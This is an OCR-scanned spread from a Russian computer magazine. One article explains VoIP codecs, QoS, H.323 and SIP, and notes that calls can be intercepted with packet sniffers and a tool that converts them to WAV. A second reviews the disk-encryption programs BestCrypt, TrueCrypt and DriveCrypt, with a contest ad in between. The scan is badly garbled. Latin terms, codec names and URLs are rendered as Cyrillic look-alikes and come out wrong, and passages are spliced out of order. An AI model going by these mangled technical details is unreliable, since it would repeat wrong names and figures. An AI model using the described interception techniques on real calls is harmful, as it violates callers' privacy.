тавить речевой сигнал в цифровом ви- 
де, то есть в виде нулей и единичек, 
которые можно разместить в ІР-паке- 
тах и отправить получателю. Задачами 
кодирования и декодирования занима- 
ются кодеры и декодеры, которые 
очень часто являются единым целым. 
Важную роль играет кодек или алго- 
ритм, который используется кодером 
и декодером для оцифровки голоса, и 
наоборот. В ѴоІР применяются раз- 
личные кодеки, но в основе каждого 
из них лежит непрерывное сэмплиро- 
вание аудиопотока. Кодек обрабаты- 
вает поступившие с микрофона дан- 
ные несколько тысяч раз в секунду, 
таким образом получаются минималь- 
ные отрывки (сэмплы) голосового со- 
общения. Каждый из них преобразо- 
вывается в цифровой вид и сжимает- 
ся для последующей передачи. Когда 
несколько тысяч этих отрывков сое- 
диняются в единое целое, микроско- 
пические паузы между ними становят- 



ся незаметными для человеческого 
уха, поэтому звучание практически не 
отличается от того, что мы привыкли 
слышать по обычному телефону. 
Количество разбиений в секунду нап- 
рямую зависит от используемого ко- 
дека. Так 0.711 дает максимальное 
качество звучание и обрабатывает 
аналоговый поток 64,000 раз в секун- 
ду, что требует немалых вычислитель- 
ных затрат и, естественно, довольно 
широкого канала. Другие кодеки та- 
ким трудолюбием похвастаться не мо- 
гут, поэтому обращаются к аналого- 
вым данным 32,000 и даже 8,000 в се- 
кунду. Но не думай, что этого мало: на- 
иболее распространенный кодек — 
0.729А — работает как раз на скорос- 
ти в 8,000 и считается золотой сере- 
диной между качеством звука и затра- 
тами на передачи цифровых данных. 

В основе кодеков лежат сложные ал- 
горитмы, которые занимаются разби- 
ением аналоговых данных на отрывки, 
их сжатием и упаковкой. Наиболее из- 
вестным считается алгоритм с непро- 
износимым названием С5-АСЕІ-Р 
(Сопфдаіе Зігисіиге АІдеЬгаіс Собе 
Ехсііеб Ыпеаг Ргебісііоп). Он использу- 
ет одно очень простое, но чрезвычай- 
но эффективное правило: «Если ник- 



то не говорит, значит, данные переда- 
вать не нужно». Казалось бы, что в 
этом такого? А в том, что все сигналь- 
ные фрагменты можно условно разде- 
лить на несколько типов: вокализиро- 
ванные (голос человека), невокализи- 
рованные, переходные и паузы. При 
одной и той же длительности и качест- 
ве кодирования разных типов отрыв- 
ков требуется неодинаковое количе- 
ство битов (при том, что паузы не нуж- 
но кодировать вообще). Соответ- 
ственно, скорость передачи разных 
типов отрывков также сильно варьи- 
руется. По этой причине было принято 
решение использовать метод переда- 
чи речи с разной скоростью. Необхо- 
димая скорость определяется специ- 
альным классификатором, который 
на основе анализа входных данных 
выбирает нужный метод кодирования. 
Наиболее простым классификатором 
является Ѵоісе Асііѵііу Оеіесіог (ѴАС), 
который умеет определять два состо- 
яния входных данных: голос и паузы. 
Фрагменты, которые были классифи- 
цированы как голос, передаются на 
большой скорости. Паузы, что следо- 
вало ожидать, кодируется с меньшей 
детализацией и требуют для передачи 
значительно меньшую скорость. 



ВСЯ ПРОБЛЕМА 
В ЗАДЕРЖКАХ 



Для комфортной передачи голоса нужен широкий канал. 
Но даже очень высокая пропускная способность не помо- 
жет тебе насладиться разговором, если задержки с дос- 
тавкой пакетов до адресата будут достигать хотя бы поло- 
вины секунды. Вспомни левый пиратский диск со свежим 
блокбастером, в котором из-за чьих-то кривых рук прои- 
зошла рассинхронизация видео и звука. Смотреть такое 
кино невозможно, также нереально будет и разговари- 
вать с задержками. Вот почему так важно снизить их до 
минимума и гарантировать, что они не возрастут выше оп- 
ределенного потолка. Для этого применяется сразу нес- 
колько методов, которые в самых разных ситуациях до- 
полняют друг друга и выдают максимальный результат. 
Резервирование части полосы исключительно для ѴоІР — 
это самое очевидное и, что очень важно, эффективное ре- 
шение. В обычных сетях ЕіЬегпеІ существует такое понятие, 
как качество обслуживания (ОоЗ — Оиаіііу оі Зегѵісе). Сер- 
вис выделяет часть канала специально для передачи чисто 
технической информации, чтобы обеспечить благоприятные 
условия для взаимодействия всех ключевых узлов сети, даже 
если локалка будет испытывать сверхнагрузки. Технология 
ѴоІР применяет похожие принципы, но ориентированные на 
передачу именно голосовых данных. Разработчики стандар- 
та подсчитали, что ІР-пакеты с голосовыми данными рацио- 
нальнее отправлять большими (относительно пакетов) бло- 
ками, так как только в этом случае удастся эффективно ис- 



пользовать выделенную полосу пропускания. Такой подход 
сильно упрощает процедуру управления очередями и рас- 
становки приоритетов для различного типа пакетов, что явля- 
ется серьезной проблемой для всех ІР-сетей. Правда, стоит 
отметить, что для создания блока, достаточного для отправ- 
ки, необходимо время. Конечно, это время минимально, но 
все же оно создает дополнительную задержку. 
Непосредственно резервированием ресурсов занимается 
специальный протокол РЗѴР (Резоигсе РеЗегѴайоп Ргоіосоі). 
Работает он следующим образом: узел-отправитель до пере- 
дачи ответственной информации, требующий повышенного 
качества обслуживания, посылает по сети специальное со- 
общение в формате протокола РЗѴР. В сообщении содер- 
жится информация о типе данных, которые будут далее пере- 
даны, а также запрос на выделение части полосы. Каждый 
маршрутизатор на пути следования пакета, получив такое 
сообщение, проверяет свои ресурсы и, если требования вы- 
полнимы, устанавливает запрошенный приоритет. Если та- 
кой возможности нет, то маршрутизатор отвергает запрос. 
Все просто, но у такого метода есть существенный недоста- 
ток. Выделенная таким образом полоса всегда остается пос- 
тоянной: даже при снижении активности она не будет ис- 
пользована для передачи других данных, а значит, ресурсы 
будут использованы нерационально. 

Дополнительно к протоколу РЗѴР применяется метод 
ѴѴеідИіеб Раіг Оиеиіпд (ѴѴРО). Его заслуга в том, что он позво- 
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ПРОЩАЙ МОЛОДОСТЬ! 

КОНКУРС ОТ ЗНАНИИ - СПОЗТАВ И ЖУРНАЛА «л^ 



ОН УЖЕ ОБМЕНЯЛ СВОЕ СТАРЬЕ 
НА НОВЕНЬКУЮ ВИДЕОКАРТУ... 
ТЕПЕРЬ ТВОЯ ОЧЕРЕДЬ! 
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УСЛОВИЯ: ПРИНЕСИ НАМ или пришли по почте свою САМУЮ СТАРУЮ ВИДЕОКАРТУ ( РАБОЧУЮ). 

ЕСЛИ ОНА ДЕЙСТВИТЕЛЬНО ОКАЖЕТСЯ ДРЕВНЕЙ, ТО У ТЕБЯ ЕСТЬ ВОЗМОЖНОСТЬ ВЫИГРАТЬ ТОПОВУЮ МОДЕЛЬ 
ВИДЕОКАРТЫ (Р4Ы ОІАМОЫО) ОТ МЗІ, ПОЛУЧИТЬ МРЗ-ПЛЕЕР (МРЗ МЗІ МЕОАЗТІСК 528) ИЛИ ВЕБ-КАМЕРУ (МЗІ ЗТАВСАМ+). 



Свое барахло приноси по адресу: 119992, Москва, ул. Тимура Фрунзе, дом 11, стр. 44-45, «Гейм Лэнд» 
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ПРОТОКОЛЫ 



НЕ БЕЗ 
МИНУСОВ 



ЗАКЛЮЧЕНИЕ 




На диске ты найдешь последние версии клиентов для 
общения голосом через Интернет. 




уѵ\л/ѵѵ.раске^і2ег.сот/ѵоір/[і323/5іап(іагсі5.[іітІ - 
подробнейшая инсЬа о семействе протоколов Н.323. 
уѵѵуѵѵ.Іаа5.ога/гІС5/гІс3261.[іітІ - ВГС 3261: протокол ЗІР. 




Многие задают вопрос: какой объем трафика будет 
кушать ѴоІР? Здесь многое зависит от кодека. В случае 

с а723 — примерно 1.5кб/сек. а711 9кб в секунду 

в каждую сторону. а729А 3 Кб/сек. Но необходимо 

учитывать, что когда ты молчишь. тоаФик не идет от 
тебя к собеседнику, и наоборот, когда молчит он. ты 
не принимаешь входящий трафик. 



ляет определенным образом дифференцировать трафик на 
различные типы (голос, важная техническая информация, 
просто данные) и выделять для каждого из них определен- 
ную часть полосы пропускания. Если один из типов не ис- 
пользует полностью выделенную для него полосу, то свобод- 
ный резерв может быть отдан для передачи других данных, с 
меньшим или большим приоритетом. Столь гибкий метод ре- 
ализован в дорогостоящем оборудовании фирмы Сізсо. 



Еще один способ оптимизации задержки в сети основывается 
на использовании протокола РГГСР (ВеаІ-Тіте ТгапзроД Сопігоі 
РгоіосоІ), использующий принцип адаптации к состоянию кана- 
ла. Если интенсивность трафика в сети возрастет, а выделен- 
ной полосы приложению будет не хватать, то можно уменьшить 
свои аппетиты за счет некоторой потери качества. Как только 
выделенная полоса будет достаточна для возвращения к ис- 
ходными параметрам, приложение тут же осуществит переход. 



Одним из минусов технологии ѴоІР является отсутствие единого и утвержденного стандарта. По этой причине сейчас активно ис- 
пользуются сразу два протокола, принципиально отличающихся друг от друга. Первый — Н.323 — первоначально разрабаты- 
вался для организации видеоконференций в реальном времени, но вполне пригоден для передачи только звука. По большому 
счету, это даже не один протокол, а целое семейство, каждый член которого предназначен для выполнения какой-то конкретной 
задачи. Второй протокол — ЗІР (Зеззіоп Іпіііаііоп Ргоіосоі) — был разработан специально для технологии ѴоІР и должен был ре- 
шить все проблемы, возникающие при использовании Н.323. В его основе лежит тот же принцип, что и у знакомого тебе НИР: 
запрос — ответ. Все сообщения протокола ЗІР являются простым текстом, а коды возврата — хорошо знакомыми всем пользо- 
вателям Интернета: 404 («абонент не найден»), 200 (ОК), 180 (Ріпдіпд — звонок) и т. д. Существует еще несколько других прото- 
колов, но они не нашли широкого распространения. Такое разнообразие протоколов, возможно, было даже плюсом, если бы 
все они были совместимы между собой. Однако на практике это не всегда так. 



Впрочем, отсутствие единого стандарта — это еще не самая 
страшная беда. Есть другие минусы. Первый и наиболее зна- 
чимый из них — малая надежность относительно традицион- 
ных сетей. ѴоІР передает данные через Интернет, а значит, 
они подвержены различного рода пагубным воздействиям: 
высоким задержкам, потерям пакетов, резкому изменению 
состояния канала. Если потери в канале будут достигать даже 
одного процента, то это существенным образом скажется на 
качестве связи. Не в лучшую сторону, естественно. 

Отсюда вытекает и еще один минус — сомнительная безопас- 
ность. Если ѴоІР настолько привязана к состоянию канала, то 
злоумышленнику достаточно будет организовать массирован- 
ную ЭЭоЗ-атаку на одного из абонентов или ѴоІР-шлюзов, что- 
бы полностью разорвать связь или свести разговор на нет 
(вспомни, что происходит с разговором по мобиле в зоне неу- 
веренного приема, — будет то же самое). Если полистать лен- 
ты багтрака, то для конкретного оборудования можно найти 
даже такие эксплойты, которые позволяют напакостить, не 
имея в распоряжении многотысячную армию ботов. Удручает. 
Для защиты разговоров от прослушки в ѴоІР-сетях применя- 
ется шифрование, защищающее весь путь, который прохо- 
дят голосовые данные. Однако на практике этот механизм 
практически не используется, хотя и является неотъемлемой 
частью стандарта Н.323. Виноваты в этом дополнительные 
временные затраты на шифрование и дешифрование тра- 
фика, которые, естественно, вносят дополнительную за- 
держку. С помощью обычного сканера, такого как ЕіИегеаІ 



( ѵѵѵѵѵѵ.еіИегеаІ.сот ) или Ісрбитр ( Мр ://зоигсеіогае . пеі/рго |- 
есІзАсрсІитр) . а также плагинов для работы с Зеззіоп 
ІпШаІіоп Ргоіосоі (ЗІР) апб Н.323 можно вполне успешно пе- 
рехватывать пакеты с голосовыми данными. Утилита ѵотіі 
(Ѵоісе Оѵег МізсопТідигесІ Іпіегпеі: ТеІерНопез, ИПр://ѵоппіІх!б- 
пеі.пі) удачно преобразует «цифру» в обычные в ѴѴАѴ-фай- 
лы, которые легко можно воспроизвести. 

Есть еще несколько недостатков, которые нужно учесть. 
Обычная телефонная линия всегда находится под неболь- 
шим напряжением (поэтому не стоит оголять работающий те- 
лефонный кабель зубами, если, конечно, ты не поклонник са- 
домазохизма). Любые телефонные аппараты, за исключени- 
ем беспроводных, могут работать автономно, без электри- 
ческой сети. В то же время ѴоІР-решения подобной привиле- 
гии лишены: компьютер без электричества не заработает, 
даже если ты хорошо попросишь. ІР-телефоны имеют тот же 
недостаток, хотя питание к ним может подаваться по свобод- 
ным парам витой пары, но это требует дополнительных зат- 
рат (для компьютера тоже можно подогнать дизельный гене- 
ратор, но сколько это будет стоить?). 

Еще один нюанс связан с технологиями, которые напрямую 
завязаны на использовании телефонной линии. Если в один 
прекрасный день ты решишь полностью перейти на совре- 
менные цифровые решения, но при этом используешь завя- 
занную на телефоне сигнализацию, то будь готов к приезду 
парней в синей форме. Впрочем, почему нет? Расскажешь 
им обо всех прелестях ѴоІР... 



Конечно, с обычными телефонными се- 
тями в ближайшем будущем нам расп- 
рощаться не получится. Этот переход 
не может быть осуществлен резко. Но 
зато такие именитые производители, 
как ЗСот, Сізсо, Аѵауа, Мііеі, ІМоДеІ и 
Зіетепз, предлагают гибридную систе- 
му, сочетающую традиционную телефо- 



нию и ѴоІР для тех потребителей, кото- 
рые не готовы полностью перейти на но- 
вую технологию. Подобные девайсы 
позволяют опробовать все прелести 
ѴоІР-телефонии, сохранив при этом воз- 
можность эксплуатировать старую теле- 
фонную систему. В Интернете все про- 
ще: любой желающий может закачать 



Зкуре и устраивать конференции, об- 
щаясь сразу с несколькими людьми со 
всего мира. А, например, его русскоя- 
зычный аналог — ЗірІМеІ ( ѵѵѵѵѵѵ.зірпеіги) 
— позволяет бесплатно звонить на горо- 
дские и мобильные телефоны Питера 
и Москвы. Проверял лично — работает! 

ВШАПѴ ѴОІІП’5 Т 
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РС 20ЫЕ 



ІІ К КРИПТОГРАФИЧЕСКИМ СИСТЕМАМ СЕГОДНЯ ПРЕДЪЯВЛЯЮТ САМЫЕ ЖЕСТКИЕ ТРЕБОВАНИЯ. ИС- 
ПОЛЬЗУЕМЫЕ АЛГОРИТМЫ ДОЛЖНЫ БЫТЬ КРИПТОСТОИКИМИ, ИХ РЕАЛИЗАЦИЯ — БЫСТРОЙ, А САМО 
ШИФРОВАНИЕ ДОЛЖНО ОСУЩЕСТВЛЯТЬСЯ НА ЛЕТУ, БЕЗ ПОСТОЯННОГО ВМЕШАТЕЛЬСТВА ПОЛЬЗОВА- 
ТЕЛЯ. МЫ ОТОБРАЛИ НАИБОЛЕЕ ДОСТОЙНЫХ КАНДИДАТОВ И ГОТОВЫ ИХ ТЕБЕ ПРЕДСТАВИТЬ Ц 




ОТКАЗ 
ОТ РОР 



Хочу сразу предупредить: всем известная система шифрова- 
ния данных РОР в этот обзор не попала. Именно по причине 
того, что с ней уже давно все успели познакомиться и заюзать 
основные возможности. Наша цель — показать, что это дале- 
ко не единственный инструмент для сокрытия своих данных 
от злых дядек в погонах и горе-хакеров. Существует, по край- 
ней мере, несколько очень приличных пакетов, о которых ни- 
же и пойдет речь. Их имена почему-то звучат очень похоже: 
ВезЮгурІ, ТгиеСгурІ, ОгіѵеСгурІ. Мало того, набор функций 
также не особенно отличается разнообразием. Основной за- 
дачей каждой из этих программ является создание на жест- 
ком диске (или другом носителе) небольшого файла-контей- 



нера, который в зашифрованном виде содержит данные 
и предоставляет доступ к ним только после ввода заданной 
парольной фразы. Не стоить путать такой контейнер, скажем, 
с РАР-архивом, на который установлен пароль. Это совсем не 
то! Созданный программами контейнер, как правило, можно 
примонтировать к системе, как обычный логический диск, 
и размещать на нем любые файлы, в том числе и приложения. 
Как только пользователь вводит пароль для доступа к файлу- 
контейнеру, в системе появляется новый логический диск, ра- 
бота с которым ничем не отличается от работы с любым дру- 
гим диском на твоем компьютере. На него можно установить 
любые приложения и с тем же успехом запускать их. 
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ТЕХТ СТЕПАН ИЛЬИН / 5ТЕР@САМЕІ_А№.ВІІ / 



юм-ация 

ТЕСТ-ДРАЙВ ПОПУЛЯРНЫХ КРИПТОГРАФИЧЕСКИХ СИСТЕМ 



Сегодняшний обзор открывает пакет 
ВезЮгурІ 7.20. Не потому, что это са- 
мое навороченное средство или, нао- 
борот, самое ненадежное и глюкавое, 
а просто мне так захотелось. Открою 
тебе секрет: ВезЮгурІ использую я 
лично. Опросив коллег, выяснилось, 
что предпочтение ему отдают также 
Куттер и Форб. Видимо, есть за что. 
Сразу после запуска становится ясно, 
что имеешь дело с инструментом, по- 
настоящему профессиональным. Ин- 
терфейс имеет вид проводника, так 
что сразу бери быка за рога и начинай 
действовать, а не мусоль различные 
пункты меню и кнопочки (их попросту 
нет). Так, чтобы создать контейнер, 
нужно лишь открыть меню и выбрать 
там пункт ІЧеѵѵ Сопіаіпег. Появившееся 
окно предложит указать расположе- 
ние будущего контейнера, его размер, 
пароль для доступа, а также алгоритм, 
который будет использован для шиф- 
рования и генерации файла ключа. 
Всего поддерживается 4 схемы шиф- 
рования: АЕЗ, 008Т 28147-89, ТѵѵоТізГі, 
ВІоѵѵІізИ. Первый из них является госу- 
дарственным стандартом США, второй 
— России. Неплохое доказательство 
состоятельности, не правда ли? Впро- 
чем, две других схемы — ТѵѵоТізНі и 
ВІоѵѵІізИ — считаются не менее эффек- 
тивными, поэтому ты можешь поло- 
житься на любой из предложенных ал- 
горитмов. Ученые, математики и про- 
чие пытливые умы планеты пока не 
нашли способ, позволяющий за разум- 
ное время сломать подобный шифр. 
Для того чтобы примонтировать соз- 
данный контейнер, необходимо ввес- 



ти пароль, указанный при его созда- 
нии. Если парольная фраза верна, то 
в системе очень скоро появится но- 
вый дисковый раздел, который будет 
работать, как и все остальные диски, 
с той лишь разницей, что данные на 
нем будут непрерывно шифроваться. 
Еще большей безопасности можно 
добиться, если использовать скры- 
тые контейнеры, которые поддержи- 
ваются большинством современных 
систем шифрования данных. Суть в 
том, что внутри файла-контейнера 
создается скрытая часть, содержи- 
мое которой никак не отображается 
в системе — даже сама программа 
не подозревает об ее существова- 
нии. Чтобы получить доступ, необхо- 
димо ввести дополнительный па- 
роль, и только в этом случае крипто- 
система среди нулей и единичек 
сможет найти зашифрованный заго- 
ловок раздела и примонтировать 
его. Штука гениальная, суди сам. 
Внутри скрытой части можно помес- 
тить самую сокровенную информа- 
цию, в то время как в самом контей- 
нере будут храниться обычные фай- 
лы, которые не представляют инте- 
реса и ценности (словом, «утка»!). 
Даже если тебя будут пытать утюгом 
и оказывать жесткий психологичес- 
кий прессинг, ты без опаски смо- 
жешь выдать пароль. И при этом ни- 
чего не потеряешь, так как злоумыш- 
ленник ничего полезного внутри 
обычного контейнера не найдет. Что- 
бы создать скрытую часть контейне- 
ра, а также изменить любые другие 
его свойства (используемый тип 



шифрования, пароль доступа и т.д.), 
необходимо ввести пароль для дос- 
тупа. Опция для создания скрытой 
части называется Сгеаіе Нісісіеп РагТ 
Все криптооперации ВезЮгурІ осу- 
ществляет исключительно в опера- 
тивной памяти. Это непременное ус- 
ловие того, что данные и промежуточ- 
ные результаты шифрования не будут 
записываться на жесткий диск в отк- 
рытом виде. Отныне можно не боять- 
ся внезапного отключения электриче- 
ства, поскольку при отключении ком- 
па содержимое оперативки будет 
безвозвратно утеряно, а файлы внут- 
ри контейнера так и останутся в за- 
шифрованном виде. Правда, есть 
здесь один тонкий нюанс. При недос- 
татке памяти ѴѴіпбоѵѵз активно пере- 
мещает часть данных из оперативы 
на жесткий диск, в зѵѵар-файл. При 
этом некоторые данные, которые, 
возможно, представляют ценность, 
будут записаны на диск в открытом 
виде (подробнее читай во врезке). 
ВезЮгурІ — это единственная из 
представленных программ утилита, 
которая поддерживает шифрование 
зѵѵар-файла. Включить соответствую- 
щую опцию можно через меню: 
Орііопз -> Зѵѵар Рііе Епсгурііоп ІЛіІіІу. 
Вердикт: авторитетное средство для 
сокрытия информации, которое ис- 
пользуют многие члены Х-Сгеѵѵ. На- 
дежно зашифрует не только обыч- 
ные данные, но и зѵѵар-файл. Часть 
исходного кода разработчики сво- 
бодно распространяют в Сети, что 
является неплохим гарантом отсут- 
ствия трояна от спецслужб. 



ВЕЗТСВѴРТ 7.20 
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ТВУЕСВУРТ 4.1 



\ЛЛЛЛЛ/.ТРиЕСЯУРТ.ОЯО 
1,3 МБ, ОРЕЫ-ЗОтСЕ 



Использование систем шифрования данных еще не га- 
рантирует полную безопасность. Выбираем из трех зол. 
Первое зло — файл-подкачки. В любой момент вре- 
мени ѴѴпісіот использует злѵар-файл, в котором пе- 
ремещает часть программ и данных, не поместив- 
шихся в оперативную память. Это грозит тем, что 
часть секретных данных в незашифрованном виде 
может попасть на жесткий диск. Многие из предс- 
тавленных программ пытаются блокировать доступ 
к тем участкам памяти, в которых содержатся кэши- 
рованные пароли к контейнерам и самая конфиден- 



циальная инфа. Но разве винде прика- 
жешь? При любом удобном случае она 
может отказать в доступе прикладной 
программе, и тогда уже ничего не поде- 
лаешь. Да и за всем попросту не усле- 
дишь. Вот тебе пример. Есть текстовый 
редактор: самый обыкновенный, без 
наворотов. Если пользователь откроет 
в нем, скажем, дамп с базой кредитных 
карт, то вся эта информация попадет 
в оперативную память. А из оперативы — 



На фоне раскрученных криптографи- 
ческих систем, действительно шикар- 
ные разработки нередко остаются не- 
замеченными. Программа ТгиеСгурІ, 
распространяемая с открытыми исход- 
никами, — это как раз тот самый слу- 
чай. Создатели гордо заявляют: прове- 
ряйте сколько захотите, все равно нам 
нечего от вас скрывать. Огромный 
плюс для такого рода проектов и лиш- 
ний повод спать спокойно. Становится 
вдвойне приятно, когда осознаешь, что 
этот продукт ничуть не уступает ком- 
мерческим и даже превосходит их во 
многом. Но обо всем по порядку. 
Программа распространяется в виде 
архива. После распаковки архива ее 
можно или установить в систему с по- 
мощью файла-инсталлера, или же пе- 
рейти в папку ЗеДір Рііез и сразу за- 
пустить исполняемый файл — 
ТгиеСгурі.ехе. Правда, разницы ника- 
кой нет. В систему прописывается 
низкоуровневый драйвер программы 
— 32-х или 64-битный (в зависимости 
от разрядности системы), поэтому за- 
маскировать программу от знающего 
человека все равно не удастся. По 
умолчанию ТшеСгур* знаком только с 
одним языком — английским, но при 
желании его легко можно русифици- 
ровать. Достаточно закачать с 
уѵуѵуѵ.ігиесгѵрЦога/ІосаІігаІіопз.рНр ар- 
хив с русским переводом и распако- 
вать находящийся в нем ХМЬ-файл в 
рабочую директорию программы. 
Теперь предлагаю сразу приступить к 
делу и на практике создать файл-кон- 
тейнер. А сейчас я расскажу тебе об 
основных нюансах этой программы. 

1 Процесс начинается с нажатия кноп- 
ки «Создать том», которая вызывает 
специальный мастер создания контей- 
неров. На первом этапе визард пред- 
лагает выбрать тип контейнера: обыч- 
ный или скрытый. Понятно, что первым 
нужно создать обычный контейнер и 
уже в нем размещать скрытые. 

2 Размещение тома — это следую- 
щий шаг. Если ты планируешь соз- 
дать мобильный контейнер, который 



можно перенести на другой жесткий 
диск или компьютер, необходимо 
обозначить файл, в котором он будет 
находиться. ТгиеСгурІ также позволя- 
ет шифровать целые устройства. 
Криптовать логические диски не 
очень удобно, но зато полностью за- 
шифрованная ІІЗВ-флешка наверня- 
ка сослужит тебе неплохую службу. 

3 На следующем шаге мастер предло- 
жит выбрать алгоритм шифрования 
данных, а также хэш-агоритм, который 
будет использоваться как псевдослу- 
чайная функция. По умолчанию пред- 
лагается алгоритм АЕЗ с использова- 
нием 256-битного ключа, и ты смело 
можешь оставить его по умолчанию. 
Вкупе с непревзойденной надеж- 
ностью, он является одним из быстрых. 
Производительность всех поддержи- 
ваемых алгоритмов на твоем компью- 
тере можно оценить, нажав на кнопку 
«Проверка» (в английской версии — 
ВепсИтагк). В качестве хэш-алгоритма 
ранее по умолчанию использовался 
ЗНА-1 , но после того, как в 2005 году 
был изобретен теоретический способ 
поиска коллизий, разработчики отдали 
предпочтение ВІРЕІѴЮ-160. 

4 Если ты выбрал шифрование цело- 
го диска или устройства, то этот шаг 
можно опустить. А то потребуется 
ввести размер будущего контейнера. 

5 Далее мастер предложит ввести па- 
роль для доступа к зашифрованным 
данным. Рекомендуется использовать 
пароль, имеющий не менее 20 симво- 
лов, состоящий из цифр и букв в раз- 
ном регистре, а также символов $, #, 
+ и т.д. В дополнение к паролю или 
вообще для полной его замены мож- 
но использовать файл-ключ (или нес- 
колько файлов сразу). Такой файл 
можно сгенерировать с помощью 
специальной встроенной утилиты, но 
я все-таки рекомендую выбрать пару- 
тройку композиций из своей МРЗ-кол- 
лекций. По-моему, это будет лучшим 
гарантом безопасности. Согласись, 
распознать в них файлы-ключи будет 
крайне проблематично :). Кстати го- 



воря, это отличное средство от кей- 
логгеров, которые с легкостью могут 
отснифать пароль, введенный с кла- 
виатуры, но абсолютно беспомощны 
против файлов-ключей. 

6 Форматирование тома — это следу- 
ющий и очень важный этап. ТгиеСгурІ: 
«забивает» пространство файла-кон- 
тейнера (или девайса) псевдослучай- 
ными комбинациями символов, чтобы 
полностью исключить возможность 
его анализа. На этом же этапе можно 
обозначить параметры будущего раз- 
дела: используемую файловую систе- 
му и размер кластера. Обращаю твое 
внимание на важный нюанс: для того 
чтобы внутри этого контейнера мож- 
но было создать скрытые части, в ка- 
честве файловой системой обяза- 
тельно должна быть выбрана РАТ. 
Создание скрытого контейнера осу- 
ществляется аналогично, но тебе 
придется указать базовый контей- 
нер или устройство, внутри которого 
он будет располагаться. Для того 
чтобы примонтировать зашифрован- 
ный контейнер или устройство, не- 
обходимо в главном окне программы 
указать к нему путь, выбрать букву 
диска и нажать кнопку «Смонтиро- 
вать». Новый логический диск поя- 
вится в системе, как только ты ука- 
жешь пароль доступа, а также необ- 
ходимые файлы-ключи. 

Вердикт: добротное средство, которое 
распространяется в открытых исходни- 
ках, что фактически гарантирует отсут- 
ствие троянов и отмычек для спецслужб. 
Поддержка десятка алгоритмов шифро- 
вания (АЕЗ, ВІоѵѵТізІэ, САЗТ5, Зегрепі, 
Тгіріе ОЕЗ, Т ѵѵоЛзНі , АЕЗ-Т ѵѵоТізИ , АЕЗ- 
ТѵѵоТізІэ, Зегрепі-АЕЗ, Зегрепі-ТѵѵоІізИ- 
АЕЗ, ТѵѵоТізН-ЗегрепІ:), возможность ис- 
пользования файлов-ключей и шиф- 
рования целых устройств — показа- 
тель отличной функциональности. 
Помимо этого, ТгиеСгурІ поддержи- 
вает работу через командную строку 
и имеет отличную документацию с 
популярным описанием алгоритмов 
шифрования. 



3 



Файловую систему ІМТГЗ поддерживает собственное шифрова- 
ние данных (Епсгѵріеб Рііе Зѵзіет). Доступ к закриптованным 
Файлам имеет только пользователь, активизировавший для этих 
Файлов шифрование. Одна лишь проблема — благодаря прог- 
рамме Асіѵапсесі ЕРЗ Раіа Весоѵегѵ (ѵѵѵѵѵѵ.равзѵѵогсів.ги) обойти 
такую защиту можно всего за несколько минут. 




Дистрибутивы систем шифрования данных ждут тебя на диске. 
Рекомендую не медлить и быстро установить одну из 
понравившихся утилит. 
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возможно, в 8\ѵар. И ничего с этим не 
поделаешь. Разве что отключишь файл 
подкачки (Свойства «Моего компьюте- 
ра» Дополнительно -> Параметры 
быстродействия -> Дополнительно -> 
Изменить -> Без файла подкачки). 
Второе зло — ждущий режим 
(НіБегпагіоп Моае). Когда компьютер 
уходит в спячку, содержимое его опе- 
ративной памяти, регистров процессо- 
ра и т.д. сохраняется в специальный 



файл на жестком диске. Системы шифрования дан- 
ных этому помешать не могут. Вывод: использовать 
ждущий режим во время работы с важными данны- 
ми не стоит. 

Третье зло — многопользовательский режим. Если 
ты примонтировал к системе контейнер с зашифро- 
ванными данными, то он становится доступен для 
всех пользователей сразу. Чтобы исключить возмож- 
ность доступа к нему, необходимо использовать 
файловую систему ПТЕ8 и устанавливать на файлы 
и папки соответствующие права доступа. 



Настоящий монстр, поддерживающий 
1344-битное шифрование жесткого 
диска. Основной задачей, конечно же, 
является создание и обслуживание за- 
шифрованных контейнеров. Создать 
такой несложно: достаточно выбрать 
меню Рііе -> Сгеаіе Сопіаіпег ТМе и отве- 
тить мастеру I ѵѵапі Іо сгеаіе а ЭгіѵеСгурІ: 
сопіаіпег Тог ту сіізк. Как обычно, прога 
попросит ввести параметры контейне- 
ра: его размер, файловую систему, фи- 
зическое расположение на диске. 
Шифрование каждый раз осуществля- 
ется по-разному: для этого требуется 
некоторый набор случайных чисел, ко- 
торый генерируется за счет движений 
твоей мыши. После того как необходи- 
мая последовательность будет сгене- 
рирована, ЭгіѵеСгурІ: предложит опре- 
делиться непосредственно с алгорит- 
мом шифрования. Благо есть из чего 
выбирать: поддерживаются АЕ5, 

ВІоѵѵТізГі, Теа 16, Теа 32, Эез, Тгіріе Эез, 
Мізіу 1 и Зциаге. После выбора тобой 
схемы шифрования, создание контей- 
нера будет завершено. 

Самое время организовать скрытую 
часть контейнера. Тут надо сказать, 
что продуманность интерфейса и об- 
щая юзебилити ЭгіѵеСгурТа оставля- 
ет желать лучшего. Если в том же 
ТгиеСгурІ'е для создания скрытого 
раздела достаточно было нажать од- 
ну кнопочку и руководствоваться на- 
путствиями мастера, то здесь тебе 
придется сначала примонтировать 
существующий контейнер, затем за- 
лезть в его свойства и уже оттуда 
выбрать пункт ІпѵізіЫе сіізк сгеабпд. 
Справедливости ради замечу, что да- 
лее все идет как по маслу. 



Примечательно, что ЭгіѵеСгурІ: позво- 
ляет организовать совместный дос- 
туп к зашифрованным данным очень 
продумано и удобно. Чтобы предоста- 
вить доступ к контейнеру другому ли- 
цу, необходимо создать для него вре- 
менный ЭКР-ключ (меню Рііе -> Сгеаіе 
ОКЕ Ассезз Рііе). На использование 
ключа можно наложить различные ог- 
раничения: количество дней, которые 
он будет действителен, временные 
рамки (например, только ночью) и т.д. 
По завершению работы специально- 
го мастера получится небольшой 
ЭКР-файл, который необходимо от- 
дать пользователю, заодно сообщив 
пароль, который был на него установ- 
лен. Этот ключ можно хранить, где 
угодно, однако действительным он 
будет только на той машине, где был 
создан. Более того, с помощью ЭКР- 
кпюча доступ возможен исключитель- 
но к содержимому контейнеру, в то 
время как все настройки и опции (в 
том числе возможность создания еще 
одного ключа) будут заблокированы. 
ЭгіѵеСгур* поддерживает стеногра- 
фию и может разместить особо кон- 
фиденциальные данные внутри 16- 
битных ѴѴАѴ-файлов. Чтобы создать 
такие файлы, понадобятся мультиме- 
диа-конвертер, такой как ѴѴіпЭас или 
СооІ ЕсЩ (их рекомендуют разработ- 
чики, поэтому они доступны для закач- 
ки с официального сайта программы). 
Существует также другая версия 
программы — ОгіѵеСгурі РІиз Раск, 
которая, несмотря на схожее назва- 
ние, является вполне самостоятельно 
разработкой. Это средство по праву 
можно порекомендовать параноикам, 



и они наверняка останутся довольны. 
ЭгіѵеСгурІ РІиз Раск не создает кон- 
